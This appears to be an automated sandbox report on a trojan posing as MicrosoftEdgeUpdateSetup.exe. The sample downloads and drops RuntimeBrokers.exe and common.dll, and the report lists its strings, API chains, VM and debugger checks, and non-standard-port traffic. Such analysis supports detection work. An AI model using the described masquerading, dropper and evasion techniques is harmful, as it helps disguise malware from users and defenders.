Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RuntimeBrokers.exe, RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr String found in binary or memory: http://lol.qq.com/client/client.shtml?uin=%u&area=%u&timestamp=%u&Signature=%s
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: RuntimeBrokers.exe, RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C103E77: CreateFileW,GetLastError,??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z,CloseHandle,DeviceIoControl,GetLastError,??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z,CloseHandle, 1_2_6C103E77
Detected potential crypto function
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_001788FD 0_2_001788FD
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016D145 0_2_0016D145
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0017726C 0_2_0017726C
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00175308 0_2_00175308
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0017738C 0_2_0017738C
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_001674A9 0_2_001674A9
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00174E70 0_2_00174E70
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0043E17A 1_2_0043E17A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004DE490 1_2_004DE490
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004F459C 1_2_004F459C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004D4710 1_2_004D4710
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0044C93C 1_2_0044C93C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C49A9 1_2_004C49A9
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004B0A40 1_2_004B0A40
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C4BD8 1_2_004C4BD8
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004B0BE2 1_2_004B0BE2
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00504BE0 1_2_00504BE0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C5041 1_2_004C5041
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004DF3AA 1_2_004DF3AA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0043D4F3 1_2_0043D4F3
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C5996 1_2_004C5996
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004D5BA0 1_2_004D5BA0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C5E5F 1_2_004C5E5F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00505EF0 1_2_00505EF0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0A6D10 1_2_6C0A6D10
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C16677A 1_2_6C16677A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C7E9A 1_2_6C0C7E9A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: String function: 001689D0 appears 33 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 0046C76B appears 157 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 00409053 appears 52 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 0046C66E appears 138 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 6C1C2F1B appears 334 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 6C1C2F4F appears 207 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 6C0BE945 appears 154 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 004AF019 appears 74 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 6C1C2F86 appears 82 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 00508550 appears 34 times
PE / OLE file has an invalid certificate
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: invalid certificate
Uses 32bit PE files
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: RuntimeBrokers.exe.0.dr Binary string: GetNativeSystemInfokernel32IsWow64Processkernel32\Device\HarddiskVolume:[KillAllProcess]create snapshot fail[KillAllProcess]process: [KillAllProcess]kill failed
Source: common.dll.0.dr Binary string: [Sys_wrapper]WritePrivateProfile fail, session:{}, key:{}, file:{}NtSuspendProcessntdllNtResumeProcess[Sys_wrapper]GetStrValueFromReg, open reg key failed, key:{}, error:{}[Sys_wrapper]GetStrValueFromReg, get reg value failed, key:{}, value_name:{}, error:{}[Sys_wrapper]GetStrValueFromReg, invalid size[Sys_wrapper]SetRegValue, open reg path failed, path:{}, error:{}[Sys_wrapper]SetRegValue, set reg value failed, path:{}, value_name:{}, value:{}, error:{}[Sys_wrapper]ACLineStatus:{},BatteryFlag:{}kernel32\Device\HarddiskVolume\\.\PhysicalDrive%dA:\%SystemDrive%\ :TENINSTIPGlobal\%s_%X_%dd:\ci_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h[ProcessHelp][RetrieveGameImagePathByProcessId]MapViewOfFile fail, hListMap:%p, err:%d[ProcessHelp][RetrieveGameImagePathByProcessId]OpenFileMappingA fail, iamge path:%s, err:%dH:3
Source: classification engine Classification label: mal60.troj.evad.winEXE@3/4@0/2
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00163E83 GetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree, 0_2_00163E83
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00161F55 SHGetKnownFolderPath,GetDiskFreeSpaceExW,CoTaskMemFree, 0_2_00161F55
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0047C0FD CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessImageFileNameW,CloseHandle,Process32NextW,CloseHandle, 1_2_0047C0FD
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C156FE1 ?TaskBarPin@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@Z,__EH_prolog3_GS,?IsWin10_OS@Sys_wrapper@common@ierd_tgp@@SA_NXZ,ShellExecuteW,GetCurrentProcess,?ChangeProcessImageName@Sys_wrapper@common@ierd_tgp@@SA_NPAXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z,CoInitialize,memset,LoadLibraryW,LoadStringW,CoCreateInstance,memset,wcscpy_s,PathRemoveFileSpecW,wcscpy_s,PathStripPathW,SysFreeString,VariantClear,VarBstrCmp,SysFreeString,SysFreeString,SysFreeString,VariantClear,CoUninitialize,FreeLibrary, 1_2_6C156FE1
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_001627A1 FindResourceW,SizeofResource, 0_2_001627A1
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUF98A.tmp Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exe Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Mutant created: NULL
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUF98A.tmp Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: kernel32.dll 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: async 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: /%s 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: /%s 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: asyncupdate 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: /%s 0_2_00163109
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RuntimeBrokers.exe String found in binary or memory: -launcher
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: %1!s!-Installationsprogramm
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: r das %1!s!-Installationsprogramm ist Windows 2000 Service Pack 4 oder h
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: %1!s!-installeerder
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: Onbekende InstalleerderfoutTKon nie installeer nie. %1!s!-installeerder vereis Windows 2000 Dienspak 4 of beter.PAMicrosoft
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: ruf fl-Installatur _L-installazzjoni ma rnexxietx. %1!s! Installatur je'
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: %1!s! Installer&Hindi Alam na Error sa Installer ErrorZHindi na-install. Kailangan ng %1!s! Installer ang Windows 2000 Service Pack 4 o mas bago.Microsoft
Source: unknown Process created: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe "C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe"
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Process created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe"
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Process created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe" Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: common.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: MicrosoftEdgeUpdateSetup.exe Static file information: File size 1634896 > 1048576
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x166200
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\ci_dev\wegame_client\build\bin\Release\tcls_core.pdb source: RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: mi_exe_stub.pdb source: MicrosoftEdgeUpdateSetup.exe
Source: Binary string: D:\ci_dev\wegame_client\build\lib\Release\common.pdb source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: #lkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0045E100 LoadLibraryW,GetProcAddress,FreeLibrary, 1_2_0045E100
PE file contains an invalid checksum
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: real checksum: 0x198153 should be: 0x190fbb
Source: common.dll.0.dr Static PE information: real checksum: 0x3bfec6 should be: 0x3c4694
Source: common[1].dll.0.dr Static PE information: real checksum: 0x3bfec6 should be: 0x3c4694
PE file contains sections with non-standard names
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: section name: .didat
Source: common[1].dll.0.dr Static PE information: section name: .QMGuid
Source: common.dll.0.dr Static PE information: section name: .QMGuid
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00179167 push ecx; ret 0_2_00179166
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004AEFE2 push ecx; ret 1_2_004AEFF5
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004AF236 push ecx; ret 1_2_004AF249
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C1C2EE4 push ecx; ret 1_2_6C1C2EF7
Contains functionality to download and launch executables
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00166690 URLDownloadToFileA,URLDownloadToFileA,ShellExecuteA,exit, 0_2_00166690
Drops PE files
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\common[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Jump to dropped file
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Roaming\common.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0041ABA7 GetPrivateProfileIntW, 1_2_0041ABA7
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00478D13 GetPrivateProfileIntW, 1_2_00478D13
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004517EF SHGetFolderPathW,GetPrivateProfileIntW, 1_2_004517EF
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00451970 SHGetFolderPathW,GetPrivateProfileStringW, 1_2_00451970

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknown Network traffic detected: HTTP traffic on port 16653 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknown Network traffic detected: HTTP traffic on port 16653 -> 49730
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain checking for user administrative privileges
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0044D2F4 rdtsc 1_2_0044D2F4
Contains functionality to query network adapater information
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: ?get_first_mac2@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,__EH_prolog3_catch_GS,GetAdaptersInfo,GetAdaptersInfo,?get_log_instance@base@@YAPAVILogger@1@XZ,__Init_thread_footer, 1_2_6C127C98
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\common[1].dll Jump to dropped file
Found evaded block containing many API calls
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Evaded block: after key decision
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe API coverage: 0.9 %
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_0016207E
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016231F FindFirstFileExW,GetSystemTimeAsFileTime,FindNextFileW,FindClose, 0_2_0016231F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00484A62 FindFirstFileW,MoveFileExW,CopyFileW,FindNextFileW,FindClose, 1_2_00484A62
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0046CDBA FindFirstFileW,_wcsrchr,_wcsrchr,DeleteFileW,FindNextFileW,FindClose, 1_2_0046CDBA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00468440 GetLogicalDriveStringsW,QueryDosDeviceW, 1_2_00468440
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0017B9B7 VirtualQuery,GetSystemInfo, 0_2_0017B9B7
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Gc
Source: common.dll.0.dr Binary or memory string: WQLSELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=TRUEroot\cimv2Win32_NetworkAdapterConfigurationSetDNSServerSearchOrderDNSServerSearchOrderIndexCaptionvmwarevirtualWin32_NetworkAdapterConfiguration.Index=%d[repair_dns] success.
Source: RuntimeBrokers.exe Binary or memory string: vmware
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
